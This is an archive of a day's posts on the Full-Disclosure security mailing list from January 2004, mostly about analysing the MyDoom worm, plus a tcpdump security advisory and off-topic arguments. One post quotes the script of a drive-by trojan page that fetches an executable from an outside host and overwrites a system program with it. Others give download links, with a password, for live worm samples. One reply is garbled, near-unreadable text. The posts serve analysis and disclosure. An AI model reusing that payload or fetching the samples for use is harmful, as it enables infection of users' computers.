date:20040131

Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Puneet Arora

I think Daniel E. Spisak is quite right 
why would anyone post a virus/backdoor creation of hiw
own?
Also if he wanted..he would have disributed in Executable form...not
the xipped one.right.
- Original Message - 
From: "first last" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Saturday, January 31, 2004 5:58 AM
Subject: RE: [Full-Disclosure] MyDoom download info


> > > to successfully unpack the program. All they really needed to
> > > do was dump it from memory while it was running and they could've
> >analyzed
> > > it immediately with any disassembler.
> >
> >Forgive me, I am no assembly hacker nor much of a programmer,
> >but would it be possible for a program to 'react' in some way
> >were one to try to dump it from memory?
>
> The program would have to use a device driver to protect itself from not
> being dumped from memory to disk. But there are ways around that as well.
>
> _
> Get a FREE online virus check for your PC here, from McAfee.
> http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] MyDoom download info.

2004-01-31 Thread Feher Tamas

Hello,

>http://www.nonmundane.org/~dspisak/danger/MyDoomB.exe

Run it under VMware and confirmed. Aladdin Stuffit format self-
extracting archive, contains MyDoom.B worm executable (29,184 bytes) 
inside.

However the AV industry standard is always to send virus samples in 
passworded ZIP archive format and nothing else. Never trust 
executables!

BTW, apparently there is a yet undiscovered bug in MyDoom.B code 
that prevents it from spreading effectively. Much of the code is 
encrypted, so dissecting processes sowly.

Regards, Tamas Feher.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] MyDoom download info.

2004-01-31 Thread first last

BTW, apparently there is a yet undiscovered bug in MyDoom.B code
that prevents it from spreading effectively. Much of the code is
encrypted, so dissecting processes sowly.
It's still UPX packed, but it won't unpack with "UPX -d" because the author 
used a simple UPX scrambler. Either undo what he did or unpack it manually 
and you'll see all the code. The easiest way for anyone inexperienced with 
this is just to dump the memory to a file when the virus is running. But you 
don't think the anti-virus companies already know everything about this 
virus? It's been a few days now and they should've found out everything they 
needed to know the very same day they got their first copy of MyDoom.B.

_
Let the new MSN Premium Internet Software make the most of your high-speed 
experience. http://join.msn.com/?pgmarket=en-us&page=byoa/prem&ST=1

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom download info.

2004-01-31 Thread first last

> It's still UPX packed, but it won't unpack with "UPX -d" because the 
author
> used a simple UPX scrambler. Either undo what he did or unpack it 
manually
> and you'll see all the code.

It actually un-UPX-ed just fine for me. What version have you been trying?
MyDoom.B as posted by someone else on this list. UPX -d doesn't work so you 
have to do it manually which shouldn't be a problem.

It disassembled nicely after that. The only other obfuscation (apart from
quite a bit of wild jmp'ing around) is the rot13'ed strings, which isn't,
erm, too challenging. Anything else?
Anyone with basic assembler knowledge could understand MyDoom and any other 
virus.

_
High-speed usersbe more efficient online with the new MSN Premium Internet 
Software. http://join.msn.com/?pgmarket=en-us&page=byoa/prem&ST=1

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom download info.

2004-01-31 Thread jan . muenther

> It's still UPX packed, but it won't unpack with "UPX -d" because the author 
> used a simple UPX scrambler. Either undo what he did or unpack it manually 
> and you'll see all the code. 

It actually un-UPX-ed just fine for me. What version have you been trying?
It disassembled nicely after that. The only other obfuscation (apart from
quite a bit of wild jmp'ing around) is the rot13'ed strings, which isn't,
erm, too challenging. Anything else? I've only looked quickly at it during a
train ride.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom download info.

2004-01-31 Thread jan . muenther

> >It actually un-UPX-ed just fine for me. What version have you been trying?
> 
> MyDoom.B as posted by someone else on this list. UPX -d doesn't work so you 
> have to do it manually which shouldn't be a problem.

Oh, that clarifies it - I've just been looking at a copy of .A as it came to
me amass. Of course de-UPX'ing manually is not a problem. 

> Anyone with basic assembler knowledge could understand MyDoom and any other 
> virus.

Well, I'd be a tad bit careful with the 'any' bit, but the recent stuff or
your everyday malware is really not at all hard to understand, which is why
large part of the discussions here sort of amazed me. 
What I want to say: My point exactly.

Cheers, J.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] REST and Virii?

2004-01-31 Thread jim

Is it possible, that we never analyze the whole picture. And virii is much more 
coordinated.

REST stands for REpresentational State Transfer, and is an architectural style for 
large-scale software design.

REST suggests that what the Web got right is having a small, globally defined set of 
remote methods (HttpMethods: GET, POST, PUT, DELETE, etc) applied to any thing 
(specifically, any resource), because such a system allows a maximum number of 
otherwise uncoordinated actors to interoperate.

Take a closer look at:
http://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm

--
Jim

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] mydoom.exe decyphering?

2004-01-31 Thread Danny



Sophos says:
 (sync-1.01; andy; I'm just doing my job, nothing personal, sorry)

OK, this can readily be deducted somewhat from the mydoom.exe but not 
entirely. Ironically aladdin systems can find itself back in the worm's 
'strings' output... a part of it is compressed with stuffit.

[download MyDoomB, cut out the StuffIt part, unstuff it and cut out the 
(3rd/last) data part (use tail or so). Then hexdump -C that one again]

Here's the part with the text (use fixed font in your mail client):

HEX ff  87  22  92  00  0a  0a  28  73  79  6e  63  2d  31  2e  fd
ASCII   *   *   32  *   0   10  10  40  115 121 110 99  45  49  46  *
SYMBOL  *   *   "   *   *   *   *   (   s   y   n   c   -   1   .   *

HEX ff  6f  ff  30  31  3b  20  61  6e  64  79  5   49  27  6d  20
ASCII   *   111 *   48  49  59  32  97  110 100 121 5   73  39  109 32
SYMBOL  *   o   *   0   1   ;   a   n   d   y   *   I   '   m

HEX 6a  75  73  74  20  64  6f  69  6e  67  20  6d  79  6b  ff  ef
ASCII   106 117 115 116 32  100 111 105 110 103 32  109 121 107 *   *
SYMBOL  j   u   s   t   d   o   i   n   g   m   y   k   *   *

HEX bf  0d  6f  62  2c  20  6e  6f  74  68  0f  70  65  72  73  6f
ASCII   *   13  111 98  44  32  110 111 116 104 15  112 101 114 115 111
SYMBOL  *   *   o   b   ,   n   o   t   h   *   p   e   r   s   o

HEX 6e  61  6c  11  06  a6  fb  ae  7d  72  72  79  29  42  47  40 
ASCII   110 97  108 17  6   *   *   *   125 114 114 121 41  66  71  64
SYMBOL  n   a   l   *   *   *   *   *   }   r   r   y   )   B   G   @

So: (sync-1...o.01; andy.I'm just doing mykob, noth.personal.}rry)

A few observations:

- 'noth*' seems to get its 'ing ' part from the token 'doing '
- likewise ' just' must be the inspiration for ' job' replacing the ' j' with 
'k' where * are non ascii. Note that ' just' fits into '' and j=k-1 
- '*}rry' should translate to ' sorry' or (sophos) ', sorry'
- is it sync-1.01 or perhaps sync-1.1.p01 or so, anyone has any idea what this 
sync is anyway
- if BG@ at the end could in some way end up being 'BEGIN' we have an 
uuencoded remainder which would have to be 'decrypted' first.
- how did sophos fill in the blanks, or did they

One would think the entire data chunk would be encrypted or encoded or 
whatever you want to call it in the same manner (something like uuenc/decode 
can be used to have binary data be changed and obfuscated as text and 
restored to binary through a 1 on 1 (de)obfuscation, right?).

Any thoughts? Is this a known algorithm that I'm not aware of for unicode 
compressing or something alike? How do other people investigate a binary? (I 
look at hexdumps, strings, output of 'file', magic numbers/strings...)

Let me dare say something I'm going to regret (heck this list is full of 
flamethrowers anyway ;-) To be honest, I have an unpleasant feeling that this 
whole thing might be staged. It's so suggestive. But I lack the skill to look 
further and don't passionately care enough either. Yet, this is one 
interesting thing with the whole MS and SCO background.

Please note, I use FreeBSD exclusively, not Windows, but was bored and got 
interested, and I'm wondering if anyone has done any research or 
experimenting on this. I've looked at them on my FreeBSD desktop box. I'm not 
familiar with Windows code other than looking at some worm and noticing that 
it has smtp code or so. The things with archives within executables holding 
executables and even with a Mac archiving package being used, uhhmm I'll pass 
on that and just assume that that's all normal and doable out there over the 
fence :) 



Hope you don't blame me for trying to have some interesting discussion. No 
matter what your skill level, it sure beats the ever present pissing 
contents. 

Regards,

--Dan (normally lurker with habitual attraction to DEL key)

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Roland Dobbins

I know Dan Spisak personally, and can vouch for his honesty and 
integrity.

On Jan 30, 2004, at 4:38 PM, Scott Taylor wrote:

Am I the only one that found it to be a little bit shady that these 
were
made available as executables? Is the "B" version posted somewhere as
just a plain zip? I don't seem to have already received my free copy in
the mail yet.

On Fri, 2004-01-30 at 12:17, Daniel Spisak wrote:

http://www.nonmundane.org/~dspisak/danger/README-FIRST.TXT
http://www.nonmundane.org/~dspisak/danger/MyDoomA.exe
http://www.nonmundane.org/~dspisak/danger/MyDoomB.exe
--
Scott Taylor - <[EMAIL PROTECTED]>
BOFH Excuse #216:

What office are you in? Oh, that one.  Did you know that your building 
was built over the universities first nuclear research site? And wow, 
aren't you the lucky one, your office is right over where the core is 
buried!



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
-
Roland Dobbins <[EMAIL PROTECTED]> // 408.527.6376 voice
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Script Kiddies [OT]

2004-01-31 Thread qobaiashi

Am Samstag, 31. Januar 2004 00:24 schrieb Remko Lodder:
> "all i can say is they have to start somewhere"
>
> --> That is why my friends and i started Mostly-Harmless,
> we educate those persons by telling them what is good and what
> is wrong, so we can convince them script kiddie is not good
> having knowledge is good, (if u use it properly),
> so we tend to keep them on the right track, we also offer them
> hacking things, on our _own_ machines so they can not do any harm.
>
> Released exploits are indeed one of the reasons why some kids think it's
> easy
> but the most knowledged of us should know that education is our prime
> target.


OMG, are you a hacker school or smth? THAT's kiddie production...!

-q

> Cheers
>
> --
>
> Kind regards,
>
> Remko Lodder
> Elvandar.org/DSINet.org
> www.mostly-harmless.nl Dutch community for helping newcomers on the
> hackerscene

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Anyone looking to share arcane/unique/commercial OS mediums/sources

2004-01-31 Thread auto74651

mail me! :)




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re[2]: [Full-Disclosure] MyDoom download info.

2004-01-31 Thread Papp Geza

Hello last

2004. január 31., 13:07:27, írtad:

>> > It's still UPX packed, but it won't unpack with "UPX -d" because the
>>author
>> > used a simple UPX scrambler. Either undo what he did or unpack it
>>manually

This below VMware run and legalized  this also we can at that time we be
aware of because well, already. So that the worm is one selfextract archiv
file. Infect only so for the first time when if form himself executing
unfolds. This coming-out really infects dared infection to be little,
what the, MyDoom b contains.letter worm executing (29,184 byte) inside.
The AV we can industry stock, to send always virus.zip form.

One yet undiscovered bug in the MyDoom b over there may be, how.letter
code, but I do not calculate, so that encrypted would be able spreading.
Encrypted you process if intensively worm that way you anatomize, MydoomB
division  several enkrypted also is between internally codes code. I deem,
so that this within is not classified other, as: biddings.

This I mean this so, how core worm is our task, and execution's time she.
Since the author does not undo utilize UPX scramblin, the UPX D. Either
you want what unpacked you did you undo simpler, if this hand-held to see,
may not be to know to see all the code. True runs, how this the lightest
road towards anybody inexpert this him only dump the memory one file when
the virus.
 
I am aware of to deem, the anti-virus companies could this what already
every virus? Time found between two virus little, but during this little
time prospectors plenty of information. More prolonged assaying confirmed
after this him.

Must deem she virus, infection, while the UPX packed malware "dared "UPX
D"will not unpack this. True  MyDoom b gave up letter as by this somebody
other agendum. UPX D does not work so which must do one problem must not
be she hand-held.

This disassemble beautifully and then  natural, how to be challenge,
and non other. Anybody would mean collect can not BASIC lingua knowledge,
MyDoom and any other virus  his gear, their codes. The encrypted are codes
the fascinating: may not be to be aware of, so that within is hide.

Virus's writing how bidding yet  decoded solves and somebody this, shock
due will be aware of that what awaiting virus.

-- 
Üdvözlettel,
  Geysap mailto:[EMAIL PROTECTED]

www.gyik.com
"VIRUS CORE TEAM"

Fiat justitia, pereat mundus!

we protect your digital worlds... 


















 

 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disc]: [Full-Disclosure] mydoom.exe decyphering?

2004-01-31 Thread Anders

Hi,

> OK, this can readily be deducted somewhat from the mydoom.exe but not
> entirely. Ironically aladdin systems can find itself back in the worm's
> 'strings' output... a part of it is compressed with stuffit.

Are you looking at the files from the URLs posted yesterday? Those
were packed with stuffit before uploaded. The stuffit part is not in
the version that's ITW.

> So: (sync-1...o.01; andy.I'm just doing mykob, noth.personal.}rry)

> - how did sophos fill in the blanks, or did they

As discussed on the list, the files are packed with a runtime packer,
so, they have to be unpacked/dumped in order to see the unpacked data.

Best regards,
Anders


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Mydoom DDoS attack time table

2004-01-31 Thread Gadi Evron

I apologize if in my previous email I didn't make it clear, this is an 
important issue for system administrators world wide, so I am emailing 
again in regard to this subject alone - a time table for the Mydoom DDoS 
attack.

In my post from the 30th of January with the subject: "Refuting 
tall-tales and stories about the Mydoom.A and Mydoom.B worms" -
we released an analysis of the Mydoom worms DoS mechanism, refuting 
rumors about it not existing (http://www.math.org.il/mydoom-facts.txt).

You can find a _time_table _for when the DDoS attack will happen, as
calculated by a C program Joe Stewart wrote at:
http://www.math.org.il/mydoom-a-timeline.txt
Mydoom.B has a time line too, but it can't be predicted as definitely
because of an extra random check.
For more information about the DoS attack itself performed by the worm, 
how and when (including reverse engineering bits) you should check the 
above mentioned article.

	Gadi Evron.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Valdis . Kletnieks

On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray <[EMAIL PROTECTED]>  said:

> I've often thought that none of the viruses so far encountered on the
> net are actually serious.
> 
> What worries me are the viruses that have been around for a while
> and which have, so far, not been detected; these are the serious
> viruses (I'm assuming that they exist). Viruses that *don't* send
> vast amounts of email and hence get detected; viruses that *don't*
> run under a debugger, that *don't* give themselves away.

What worries me is we haven't seen *either* an actual damaging virus
(imagine if the last 2 lines of Mydoom were "sleep(4hours); exec("format c:);")
or a "sleeper" virus.  At least we can console ourselves with the thought
that a stealthy sleeper virus would almost by necessity have a very low
burn rate, and thus take a long time to compromise a significant number
of systems (if somebody has a way they'd like to share to spread quickly
while remaining stealthy, feel free to comment ;)

I wish I knew which one to be more worried about the lack of.. ;)



pgp0.pgp
Description: PGP signature

Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Valdis . Kletnieks

On Fri, 30 Jan 2004 17:07:12 PST, Daniel Spisak said:

> from, let alone the fact that I PGP sign all my email to this list?

Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3
on any of the 6 public key servers I tried.  Bonus points for (a) having
a signature other than your own on the key, (b) having signatures to
connect it into the "strongly-connected set", and (c) knowing what the
strongly-connected set is, and why it's useful to be in it.


pgp0.pgp
Description: PGP signature

Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story

2004-01-31 Thread KF

Heres the other frame...





var x = new ActiveXObject("Microsoft.XMLHTTP"); 
x.Open("GET", "http://211.19.46.20/5.exe ",0); 
x.Send(); 

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";



Gadi Evron wrote:
The past Trojan horses which spread this way took advantage of the fact 
web servers send an HTML 404 message if a file doesn't exist.

The original sample - britney.jpg - was simply an html file itself, and 
using that fact, and IE loading it. It was combined with one of the 
latest exploits of the time (I don't think MS patched it yet), and 
downloaded the Trojan horses.

This time around there is actually a picture on the web page, of a real 
honest to God girl. But in another frame.. the same story all over again.

For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Gadi Evron.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Script Kiddies

2004-01-31 Thread darren

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


The only difference between a 'script kiddie' and 90% of the 'security
experts' out there are the tools they use.

They're both clueless but at least the 'script kiddie' didn't spend $5000
on ISS Hackcamp to learn his techniques.



-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAkAa0eYACgkQVkUxEVe6w3s0JwCeN8n4VveBGmbqTM1VL4j5qwIpascA
n1gBsEGhF4ep+S4Cr9WOTnIOII2X
=Wpoa
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Script Kiddies

2004-01-31 Thread DAN MORRILL

Kinda wanted to take a minute to think about this.

The big determiner between art and junk is passion. Regardless of what you 
do, if your a good information security person, or a good hacker, you have a 
passion for the technology and the job. Doesn't really matter if you get 
paid for it or not, late evenings or not. If you have passion, then you have 
what it takes to excell in a field, any field, including information 
security.

There is a lot of passion for information security amongst some people, and 
for many it is just a job, don't take it so seriously, hey see the latest 
dilbert cartoon, and please read my blog. I

have only seen two attacks in 14 years of information security that I would 
like to meet the hacker. One from china, one from russia. Very good, still 
don't know how the boxes survived the attacks, they were that good, that 
targeted, and that unique. They had passion, should be the only ones allowed 
to have a CISSP or what ever certificate du jour is.

I think that is Uncle is railing against, and if I am right, welcome to the 
side show. MCSE's and CISSP/CISA are all in the center ring right now. But 
like any circus, it too will fold up the tent, and the side show is what 
brings the "suckers born every minute" into the big top.

R/
Dan



From: "Uncle Scrotora Balzac" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Script Kiddies
Date: Fri, 30 Jan 2004 08:23:38 -0800


I love hearing security people talk about script kiddies. It's the funniest
thing to see them walking around with their chests pushed out like 
peacocks,
 as they scoff the silly little kiddy.



_
Get a FREE online virus check for your PC here, from McAfee. 
http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Oliver Schneider

> Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3
> on any of the 6 public key servers I tried.  Bonus points for (a) having
> a signature other than your own on the key, (b) having signatures to
> connect it into the "strongly-connected set", and (c) knowing what the
> strongly-connected set is, and why it's useful to be in it.
I am quite new to this particular "security" list, and this mail is not
signed (which affects my credibility ;), however I find it disgusting how people
respond to each other here - one claiming to be smarter than the other but
also more insulting.
I know that signatures and trust are a very delicate topic, but when you
distrust anyone it's not necessary to show this in an insulting way - for your
words imply suspicions which might or might not be justified.

I also got the URLs from Daniel Spisak by private email before it was posted
here on the list. To calm down those who think it is necessary to have the
files packed as password-protected ZIP, here we go:

Download at: http://assarbad.net/stuff/temp/MyDoom.zip

Password for the ZIP archive "Full Disclosure" (without the quotes, of
course).
!!! THIS IS STILL MEANT FOR ANALYSIS AND DISASSEMBLING, ONLY !!!


Best regards,

Oliver Schneider
PS: I'll take the file down at the 2004-02-05!

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Mail undeliverable and filtered

2004-01-31 Thread Paul Schmehl

--On Saturday, January 31, 2004 3:44 PM -0500 "[EMAIL PROTECTED]" 
<[EMAIL PROTECTED]> wrote:

Your mail to [EMAIL PROTECTED]; was filtered because of
the potential spam or virus keyword  [gambling]
please contact the user by fax or telephone thank you.

For this email filter system and other powerful software visit
http://software.high-pow-er.com
Yeah!  That's high powered software all right!  I am highly impressed.

Sheesh.  (And this one will bounce too, no doubt.)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Paul Schmehl

--On Saturday, January 31, 2004 12:25 PM -0500 [EMAIL PROTECTED] 
wrote:

On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray
<[EMAIL PROTECTED]>  said:
What worries me is we haven't seen *either* an actual damaging virus
(imagine if the last 2 lines of Mydoom were "sleep(4hours); exec("format
c:);") or a "sleeper" virus.
This doesn't worry me much at all.  Since virus writing has been taken over 
by the scammers, spammers, criminals and thieves, the last thing they want 
to do is destroy their bots.  Their purpose isn't to infect and harm, it's 
to infect and use for their nefarious purposes - like the recent extortion 
attempts on online gambling sites (threatening to shut them down through 
DDoS during the Super Bowl thereby depriving them of large amounts of 
revenue.)

The irony is the vxers got replaced by the professional criminals.  Now the 
concern is not getting infected, it's making sure the computer is really 
and truly clean.  It would be nice if the malware *did* use exec(format 
C:).  It would save networks a lot of time cleaning up and identify the 
infected machines quickly. :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Script Kiddies

2004-01-31 Thread ATD

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
So whats the difference between a script kiddie and a hacker in your 
opinion?  Would it be the same difference between the "cookie cutter" 
security professionals and the actual professional?  I'm curious.





[EMAIL PROTECTED] wrote:
The only difference between a 'script kiddie' and 90% of the 'security
experts' out there are the tools they use.
They're both clueless but at least the 'script kiddie' didn't spend $5000
on ISS Hackcamp to learn his techniques.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


- --

	

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFAHB4Rf3Elv1PhzXgRApCuAJ44MjupPcmZeNyegfsJVASlSRdUbgCdElBn
mX5s42tDLvRxPW/APlVSLn0=
=GhUp
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Daniel Spisak

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I have been asked by McAfee to take down my copy of MyDoom.B as they 
have insinuated that I am now responsible for this virus spreading. 
Sorry guys, I tried to help people out here but it would seem greater 
powers are at work here. Don't email me asking for copies as I won't be 
giving any more out. I suggest you direct future request for this virus 
towards McAfee, perhaps in their infinite wisdom they will be willing 
to help other researchers.

Daniel E. Spisak
Security Engineer
OnlineSecurity
www.onlinesecurity.com
[EMAIL PROTECTED]
Cell: 562.331.1603

-BEGIN PGP SIGNATURE-
Version: PGP 8.0.3

iQA/AwUBQBwgKRUn/Hz8mr7jEQJuXQCeJP6dhDigNBmJRZ29spqDOpExQrYAoMyC
7eyngBEgA4TEOEmV1DIzlMNk
=A6V6
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Steve Wray

> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Paul Schmehl
> 
> --On Saturday, January 31, 2004 12:25 PM -0500 
> [EMAIL PROTECTED] 
> wrote:
> 
> > On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray
> > <[EMAIL PROTECTED]>  said:
> >
> > What worries me is we haven't seen *either* an actual damaging virus
> > (imagine if the last 2 lines of Mydoom were "sleep(4hours); 
> > exec("format c:);") or a "sleeper" virus.
> 
> This doesn't worry me much at all.  Since virus writing has 
> been taken over by the scammers, spammers, criminals and thieves, the
last 

Paul, your quoting is a bit off there (makes it look as if I wrote
that),
but to address the points, as one person wrote, its difficult to spread 
fast when you are trying to be stealthy; I would argue that if one is 
stealthy enough, one doesn't need to spread fast since one is trying to 
evade detection rather than evading elimination.

If a virus could spread slowly but stealthily, it could be all over
the planet and activated before any antivirus vendor became aware
of its presence and came out with a fix; it wouldn't matter much
if it took a year of quiet spreading.

Sometimes (and here I go sounding paranoid again) it seems that the
viruses and worms we see are nothing but a smokescreen; they are
SO VERY obvious.

so-called 'script kiddies' and the old school vxers wanted a quick hit
of adrenalin. Organised crime syndicates are a lot more patient.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] another Trojan with the ADO hole? + a twist in the story

2004-01-31 Thread Gadi Evron

The past Trojan horses which spread this way took advantage of the fact 
web servers send an HTML 404 message if a file doesn't exist.

The original sample - britney.jpg - was simply an html file itself, and 
using that fact, and IE loading it. It was combined with one of the 
latest exploits of the time (I don't think MS patched it yet), and 
downloaded the Trojan horses.

This time around there is actually a picture on the web page, of a real 
honest to God girl. But in another frame.. the same story all over again.

For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Gadi Evron.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [FLSA-2004:1222] Updated tcpdump resolves security vulnerabilites

2004-01-31 Thread Jesse Keating

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- ---
Fedora Legacy Update Advisory

Synopsis: Updated tcpdump resolves security vulnerability
Advisory ID: FLSA:1222
Issue date:2004-01-31
Product: Red Hat Linux
Keywords: Security
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1222
CVE Names: CAN-2003-0989, CAN-2004-0055, CAN-2004-0057
- ---

1. Topic:

Updated tcpdump packages are now available that fix multiple security
vulnerabilities which may allow remote attackers to exploit these issues
by sending carefully-crafted packets to a victim. If the victim uses
tcpdump, these packets could result in a denial of service, or possibly
execute arbitrary code as the 'pcap' user.

2. Relevant releases/architectures:

Red Hat Linux 7.2 - i386
Red Hat Linux 7.3 - i386
Red Hat Linux 8.0 - i386

3. Problem description:

Tcpdump is a command-line tool for monitoring network traffic. Tcpdump can
capture and display the packet headers on a particular network interface
or on all interfaces. Tcpdump can display all of the packet headers, or
just the ones that match particular criteria.

George Bakos discovered flaws in the ISAKMP decoding routines of tcpdump
versions prior to 3.8.1. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2003-0989 to this issue.

Jonathan Heusser discovered an additional flaw in the ISAKMP decoding
routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2004-0057 to
this issue.

Jonathan Heusser discovered a flaw in the print_attr_string function in the
RADIUS decoding routines for tcpdump 3.8.1 and earlier. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
name CAN-2004-0055 to this issue.

Users of tcpdump should update to these update packages, which contain a
backported security patch that corrects this issue.

Fedora Legacy would like to thank George Bakos and Jonathan Heusser for
discovering and disclosing these issues, as well as Christian Pearce for
providing a backported fix for Red Hat Linux 7.2, 7.3, and 8.0.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which are
not installed but included in the list will not be updated. Note that you
can also use wildcards (*.rpm) if your current directory *only* contains
the desired RPMs.

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system. This assumes that you have yum or
apt-get configured for obtaining Fedora Legacy content. Please visit
http://www.fedoralegacy.org/download for directions on how to configure
yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1222 - tcpdump security fix in rh7x, rh80

6. RPMs required:

Red Hat Linux 7.2:

SRPMS:
http://download.fedoralegacy.org/redhat/7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/7.2/updates/i386/tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.2/updates/i386/libpcap-0.6.2-17.7.2.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.2/updates/i386/arpwatch-2.1a11-17.7.2.4.legacy.i386.rpm

Red Hat Linux 7.3:

SRPMS:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/tcpdump-3.6.3-17.7.3.4.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/tcpdump-3.6.3-17.7.3.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/libpcap-0.6.2-17.7.3.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/arpwatch-2.1a11-17.7.3.4.legacy.i386.rpm

Red Hat Linux 8.0:

SRPMS:
http://download.fedoralegacy.org/redhat/8.0/updates/SRPMS/tcpdump-3.6.3-17.8.0.5.legacy.src.rpm
i386:
